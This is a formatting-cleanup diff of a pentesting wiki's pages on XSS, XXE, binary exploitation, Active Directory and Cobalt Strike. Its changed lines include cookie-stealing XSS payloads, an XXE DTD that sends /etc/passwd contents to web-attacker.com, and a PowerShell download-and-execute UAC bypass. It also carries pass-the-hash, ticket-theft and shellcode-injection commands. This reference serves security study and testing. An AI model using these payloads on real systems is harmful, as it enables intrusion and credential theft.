@ -30,7 +30,7 @@ SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
plpgsql | {admin=U/admin}
```
Note that for the following script to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with&#x20;
Note that for the following script to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with
```sql
CREATE EXTENSION dblink;

2
src/pentesting-web/websocket-attacks.md
View File

@ -82,7 +82,7 @@ You can use the **tool** [**https://github.com/PalindromeLabs/STEWS**](https://g
- **Burp Suite** supports MitM websockets communication in a very similar way it does it for regular HTTP communication.
- The [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** will allow you to manage better Websocket communications in Burp by getting the **history**, setting **interception rules**, using **match and replace** rules, using **Intruder** and **AutoRepeater.**
- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Short for "**WebSocket/Socket.io Proxy**", this tool, written in Node.js, provides a user interface to **capture, intercept, send custom** messages and view all WebSocket and Socket.IO communications between the client and server.
- [**wsrepl**](https://github.com/doyensec/wsrepl) is an **interactive websocket REPL** designed specifically for penetration testing. It provides an interface for observing **incoming websocket messages and sending new ones**, with an easy-to-use framework for **automating** this communication.&#x20;
- [**wsrepl**](https://github.com/doyensec/wsrepl) is an **interactive websocket REPL** designed specifically for penetration testing. It provides an interface for observing **incoming websocket messages and sending new ones**, with an easy-to-use framework for **automating** this communication.
- [**https://websocketking.com/**](https://websocketking.com/) it's a **web to communicate** with other webs using **websockets**.
- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) among other types of communications/protocols, it provides a **web to communicate** with other webs using **websockets.**

2
src/pentesting-web/xs-search/connection-pool-by-destination-example.md
View File

@ -12,7 +12,7 @@ Let's see how this exploit work:
- The attacker will inject a note with as many **`<img`** tags **loading** **`/js/purify.js`** as possible (more than 6 to block the origin).
- Then, the attacker will **remove** the **note** with index 1.
- Then, the attacker will \[make the **bot access the page** with the reminding note] and will send a **request** to **`victim.com/js/purify.js`** that he will **time**.&#x20;
- Then, the attacker will \[make the **bot access the page** with the reminding note] and will send a **request** to **`victim.com/js/purify.js`** that he will **time**.
- If the time is **bigger**, the **injection** was in the **note** left, if the time is **lower**, the **flag** was in there.
> [!NOTE]

2
src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
View File

@ -15,7 +15,7 @@ The idea behind this exploit is:
- The posts are loaded alphabetically
- An **attacker** can **inject** a **post** starting with **"A"**, then some **HTML tag** (like a big **`<canvas`**) will fulfil most of the **screen** and some final **`<img lazy` tags** to load things.
- If instead of an "A" the **attacker injects the same post but starting with a "z".** The **post** with the **flag** will appear **first**, then the **injected** **post** will appear with the initial "z" and the **big** **canvas**. Because the post with the flag appeared first, the first canvas will occupy all the screen and the final **`<img lazy`** tags injected **won't be seen** in the screen, so they **won't be loaded**.
- Then, **while** the bot is **accessing** the page, the **attacker** will **send fetch requests**.&#x20;
- Then, **while** the bot is **accessing** the page, the **attacker** will **send fetch requests**.
- If the **images** injected in the post are being **loaded**, these **fetch** requests will take **longer**, so the attacker knows that the **post is before the flag** (alphabetically).
- If the the **fetch** requests are **fast**, it means that the **post** is **alphabetically** **after** the flag.

8
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -157,7 +157,7 @@ server-side-xss-dynamic-pdf.md
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Note: A HTML comment can be closed using\*\*\*\*\*\***&#x20;\***\*`-->`\*\***&#x20;\***\*or \*\*\*\*\*\***`--!>`\*\*_
_**Note: A HTML comment can be closed using\*\*\*\*\*\***\***\*`-->`\*\***\***\*or \*\*\*\*\*\***`--!>`\*\*_
In this case and if no black/whitelisting is used, you could use payloads like:
@ -336,7 +336,7 @@ javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
javascript:alert(1)
java //Note the new line
script:alert(1)
@ -558,8 +558,8 @@ loop``````````````
```markup
<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg> <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">
<svg><script>alert(1)</script></svg> <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
```
### Unicode Encode JS execution

10
src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
View File

@ -48,7 +48,7 @@ t:prompt(document.cookie))
### HTML Sanitiser Markdown Bypass
The following code is **sanitising HTML input** and then **passing it to the markdown parser**, then, XSS can be triggered abusing miss-interpretations between Markdown and DOMPurify&#x20;
The following code is **sanitising HTML input** and then **passing it to the markdown parser**, then, XSS can be triggered abusing miss-interpretations between Markdown and DOMPurify
```html
<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
@ -103,10 +103,10 @@ Fuzzing examples from
[a](j a v a s c r i p t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
<javascript:alert('XSS')>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
[a](javascript:alert('XSS'))
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
@ -143,7 +143,7 @@ _http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoA
[XSS](javascript:prompt(document.cookie))
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
[XSS](javascript:alert('XSS'))
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0aprompt(1))

20
src/pentesting-web/xxe-xee-xml-external-entity.md
View File

@ -115,7 +115,7 @@ The structure is as follows:
```xml
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```
@ -178,10 +178,10 @@ Consider a scenario where the server's filesystem contains a DTD file at `/usr/l
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file'>">
%eval;
%error;
'>
%local_dtd;
]>
@ -200,10 +200,10 @@ The outlined steps are executed by this DTD:
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
@ -491,7 +491,7 @@ You can create an **entity inside an entity** encoding it with **html entities**
Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](<https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)%5C>)).
```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "<&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
<data>
<env>&exfil;</env>
</data>

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
View File

@ -8,7 +8,7 @@
### **Partial RELRO**
**Partial RELRO** takes a simpler approach to enhance security without significantly impacting the binary's performance. By **positioning the GOT above the program's variables in memory, Partial RELRO aims to prevent buffer overflows from reaching and corrupting the GOT**.&#x20;
**Partial RELRO** takes a simpler approach to enhance security without significantly impacting the binary's performance. By **positioning the GOT above the program's variables in memory, Partial RELRO aims to prevent buffer overflows from reaching and corrupting the GOT**.
This **doesn't prevent the GOT** to be abused **from arbitrary write** vulnerabilities.

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
View File

@ -107,7 +107,7 @@ log.info(f"The canary is: {canary}")
## Threads
Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-force** a canary if the binary spawns a new thread every time an attack happens.&#x20;
Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-force** a canary if the binary spawns a new thread every time an attack happens.
A buffer overflow in a threaded function protected with canary can be used to modify the master canary of the process. As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
View File

@ -12,7 +12,7 @@ With this info the attacker can **craft and send a new attack** knowing the cana
Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.
**CTF examples:**&#x20;
**CTF examples:**
- [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
- 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')`

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
View File

@ -4,7 +4,7 @@
## Basic Information
**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.&#x20;
**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.
When a program uses certain libraries (like libc), it has some built-in functions for managing how different pieces of the program talk to each other. Among these functions are some hidden gems that can act as our missing gadgets, especially one called `__libc_csu_init`.

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
View File

@ -71,7 +71,7 @@ To find the address of the `win` function, you can use **gdb**, **objdump**, or
objdump -d vulnerable | grep win
```
This command will show you the assembly of the `win` function, including its starting address.&#x20;
This command will show you the assembly of the `win` function, including its starting address.
The Python script sends a carefully crafted message that, when processed by the `vulnerable_function`, overflows the buffer and overwrites the return address on the stack with the address of `win`. When `vulnerable_function` returns, instead of returning to `main` or exiting, it jumps to `win`, and the message is printed.

2
src/reversing/reversing-tools-basic-methods/cheat-engine.md
View File

@ -55,7 +55,7 @@ Then, you do something so that **value changes**, and you **stop** the game and
![](<../../images/image (684).png>)
Cheat Engine will search for the **values** that **went from 100 to the new value**. Congrats, you **found** the **address** of the value you were looking for, you can now modify it.\
_&#x49;f you still have several values, do something to modify again that value, and perform another "next scan" to filter the addresses._
_If you still have several values, do something to modify again that value, and perform another "next scan" to filter the addresses._
### Unknown Value, known change

2
src/todo/investment-terms.md
View File

@ -23,7 +23,7 @@ Although in exchanges this is usually used to try to make a profit.
### Hedging With Futures <a href="#mntl-sc-block_7-0" id="mntl-sc-block_7-0"></a>
If a fund manager is afraid that some stocks are going to go down he might take a short position over some assets like bitcoins or S\&P 500 futures contracts. This would be similar to buying or having some assets and create a contract of selling those at a future time at a bigger price.&#x20;
If a fund manager is afraid that some stocks are going to go down he might take a short position over some assets like bitcoins or S\&P 500 futures contracts. This would be similar to buying or having some assets and create a contract of selling those at a future time at a bigger price.
In case the price goes down the fund manager will earn benefits because he will sell the assets at a bigger price. If the price of the assets goes up the manager won't earn that benefit but he will still keep his assets.

2
src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
View File

@ -76,7 +76,7 @@ tensor3d = torch.tensor([[[1, 2], [3, 4]],
### Tensor Data Types
PyTorch tensors can store data of various types, such as integers and floating-point numbers.&#x20;
PyTorch tensors can store data of various types, such as integers and floating-point numbers.
You can check a tensor's data type using the `.dtype` attribute:

4
src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
View File

@ -81,7 +81,7 @@ Calculating attention weights:
#### Step 3: Compute the Context Vector
> [!TIP]
> Just get each attention weight and multiply it to the related token dimensions and then sum all the dimensions to get just 1 vector (the context vector)&#x20;
> Just get each attention weight and multiply it to the related token dimensions and then sum all the dimensions to get just 1 vector (the context vector)
The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights.
@ -174,7 +174,7 @@ To prevent the dot products from becoming too large, scale them by the square ro
> [!TIP]
> The score is divided by the square root of the dimensions because dot products might become very large and this helps to regulate them.
**Apply Softmax to Obtain Attention Weights:** Like in the initial example, normalize all the values so they sum 1.&#x20;
**Apply Softmax to Obtain Attention Weights:** Like in the initial example, normalize all the values so they sum 1.
<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>

2
src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md
View File

@ -602,7 +602,7 @@ def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top
> [!NOTE]
> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which instead of getting k samples with the most probability, it **organizes** all the resulting **vocabulary** by probabilities and **sums** them from the highest probability to the lowest until a **threshold is reached**.
>
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities&#x20;
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities
>
> This allows to not need to select a number of `k` samples, as the optimal k might be different on each case, but **only a threshold**.
>

6
src/todo/radio-hacking/flipper-zero/fz-nfc.md
View File

@ -30,7 +30,7 @@ Flipper Zero can only read an UID, SAK, ATQA, and stored data on bank cards **wi
Bank card reading screenFor bank cards, Flipper Zero can only read data **without saving and emulating it**.
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=916&#x26;w=2662" alt=""><figcaption></figcaption></figure>
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&ixlib=react-9.1.1&h=916&w=2662" alt=""><figcaption></figcaption></figure>
#### Unknown cards <a href="#id-37eo8" id="id-37eo8"></a>
@ -38,13 +38,13 @@ When Flipper Zero is **unable to determine NFC card's type**, then only an **UID
Unknown card reading screenFor unknown NFC cards, Flipper Zero can emulate only an UID.
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=932&#x26;w=2634" alt=""><figcaption></figcaption></figure>
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&ixlib=react-9.1.1&h=932&w=2634" alt=""><figcaption></figcaption></figure>
### NFC cards types B, F, and V <a href="#wyg51" id="wyg51"></a>
For **NFC cards types B, F, and V**, Flipper Zero can only **read and display an UID** without saving it.
<figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=1080&#x26;w=2704" alt=""><figcaption></figcaption></figure>
<figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&ixlib=react-9.1.1&h=1080&w=2704" alt=""><figcaption></figcaption></figure>
## Actions

2
src/windows-hardening/active-directory-methodology/bloodhound.md
View File

@ -92,7 +92,7 @@ group3r.exe -f <filepath-name.log>
[**PingCastle**](https://www.pingcastle.com/documentation/) **evaluates the security posture of an AD environment** and provides a nice **report** with graphs.
To run it, can execute the binary `PingCastle.exe` and it will start an **interactive session** presenting a menu of options. The default option to use is **`healthcheck`** which will establish a baseline **overview** of the **domain**, and find **misconfigurations** and **vulnerabilities**.&#x20;
To run it, can execute the binary `PingCastle.exe` and it will start an **interactive session** presenting a menu of options. The default option to use is **`healthcheck`** which will establish a baseline **overview** of the **domain**, and find **misconfigurations** and **vulnerabilities**.
{{#include ../../banners/hacktricks-training.md}}

2
src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
View File

@ -127,6 +127,6 @@ If you can perform a MitM attack to a computer and inject HTML in a page he will
## Cracking NTLMv1
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/index.html#ntlmv1-attack).\
_&#x52;emember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
{{#include ../../banners/hacktricks-training.md}}

4
src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
View File

@ -14,14 +14,14 @@ You can **find Computer objects with this attribute** checking if the [userAccou
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
<strong>## ADSearch
</strong>ADSearch.exe --search "(&#x26;(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
</strong>ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
<strong># Export tickets with Mimikatz
</strong>privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:&#x3C;username> /interval:10 #Check every 10s for new TGTs</code></pre>
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs</code></pre>
Load the ticket of Administrator (or victim user) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**\
More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\

34
src/windows-hardening/cobalt-strike.md
View File

@ -19,7 +19,7 @@ The beacons of these listeners don't need to talk to the C2 directly, they can c
#### Generate payloads in files
`Attacks -> Packages ->`&#x20;
`Attacks -> Packages ->`
* **`HTMLApplication`** for HTA files
* **`MS Office Macro`** for an office document with a macro
@ -37,7 +37,7 @@ If you already has the file you want to host in a web sever just go to `Attacks
### Beacon Options
<pre class="language-bash"><code class="lang-bash"># Execute local .NET binary
execute-assembly &#x3C;/path/to/executable.exe>
execute-assembly </path/to/executable.exe>
# Screenshots
printscreen # Take a single screenshot via PrintScr method
@ -56,7 +56,7 @@ portscan [targets] [ports] [arp|icmp|none] [max connections]
# Powershell
# Import Powershell module
powershell-import C:\path\to\PowerView.ps1
powershell &#x3C;just write powershell cmd here>
powershell <just write powershell cmd here>
# User impersonation
## Token generation with creds
@ -66,14 +66,14 @@ rev2self # Stop using token generated with make_token
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
# UAC Bypass
elevate svc-exe &#x3C;listener>
elevate uac-token-duplication &#x3C;listener>
elevate svc-exe <listener>
elevate uac-token-duplication <listener>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
## Steal token from pid
## Like make_token but stealing the token from a process
steal_token [pid] # Also, this is useful for network actions, not local actions
## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated &#x3C;current_username> - it's impersonating our own cloned token.
## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token from steal_token
@ -91,36 +91,36 @@ pth [pid] [arch] [DOMAIN\user] [NTLM hash]
pth [DOMAIN\user] [NTLM hash]
## Pass the hash through mimikatz
mimikatz sekurlsa::pth /user:&#x3C;username> /domain:&#x3C;DOMAIN> /ntlm:&#x3C;NTLM HASH> /run:"powershell -w hidden"
mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
steal_token &#x3C;pid> #Steal token from process created by mimikatz
steal_token <pid> #Steal token from process created by mimikatz
## Pass the ticket
## Request a ticket
execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;username> /domain:&#x3C;domain> /aes256:&#x3C;aes_keys> /nowrap /opsec
execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
make_token &#x3C;domain>\&#x3C;username> DummyPass
## Write the ticket in the attacker machine from a poweshell session &#x26; load it
make_token <domain>\<username> DummyPass
## Write the ticket in the attacker machine from a poweshell session & load it
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
## Pass the ticket from SYSTEM
## Generate a new process with the ticket
execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;USERNAME> /domain:&#x3C;DOMAIN> /aes256:&#x3C;AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## Steal the token from that process
steal_token &#x3C;pid>
steal_token <pid>
## Extract ticket + Pass the ticket
### List tickets
execute-assembly C:\path\Rubeus.exe triage
### Dump insteresting ticket by luid
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:&#x3C;luid> /nowrap
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
### Create new logon session, note luid and processid
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### Insert ticket in generate logon session
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
### Finally, steal the token from that new process
steal_token &#x3C;pid>
steal_token <pid>
# Lateral Movement
## If a token was created it will be used
@ -157,12 +157,12 @@ beacon> spawn metasploit
# Pass session to Metasploit - Through shellcode injection
## On metasploit host
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=&#x3C;IP> LPORT=&#x3C;PORT> -f raw -o /tmp/msf.bin
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
## Run msfvenom and prepare the multi/handler listener
## Copy bin file to cobalt strike host
ps
shinject &#x3C;pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
# Pass metasploit session to cobalt strike
## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.

2
src/windows-hardening/ntlm/README.md
View File

@ -83,7 +83,7 @@ Nowadays is becoming less common to find environments with Unconstrained Delegat
You could abuse some credentials/sessions you already have on the AD to **ask the printer to authenticate** against some **host under your control**. Then, using `metasploit auxiliary/server/capture/smb` or `responder` you can **set the authentication challenge to 1122334455667788**, capture the authentication attempt, and if it was done using **NTLMv1** you will be able to **crack it**.\
If you are using `responder` you could try to \*\*use the flag `--lm` \*\* to try to **downgrade** the **authentication**.\
_&#x4E;ote that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid)._
_Note that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid)._
Remember that the printer will use the computer account during the authentication, and computer accounts use **long and random passwords** that you **probably won't be able to crack** using common **dictionaries**. But the **NTLMv1** authentication **uses DES** ([more info here](#ntlmv1-challenge)), so using some services specially dedicated to cracking DES you will be able to crack it (you could use [https://crack.sh/](https://crack.sh) or [https://ntlmv1.com/](https://ntlmv1.com) for example).

2
src/windows-hardening/windows-local-privilege-escalation/README.md
View File

@ -506,7 +506,7 @@ accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
If you are having this error (for example with SSDPSRV):
_System error 1058 has occurred._\
_&#x54;he service cannot be started, either because it is disabled or because it has no enabled devices associated with it._
_The service cannot be started, either because it is disabled or because it has no enabled devices associated with it._
You can enable it using

2
src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
View File

@ -10,7 +10,7 @@ As the values of HKCU can be modified by the users **COM Hijacking** could be us
- where the _Result_ is **NAME NOT FOUND**.
- and the _Path_ ends with **InprocServer32**.
Once you have decided which not existent COM to impersonate execute the following commands. _Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill._&#x20;
Once you have decided which not existent COM to impersonate execute the following commands. _Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill._
```bash
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"

2
theme/highlight.js
View File

File diff suppressed because one or more lines are too long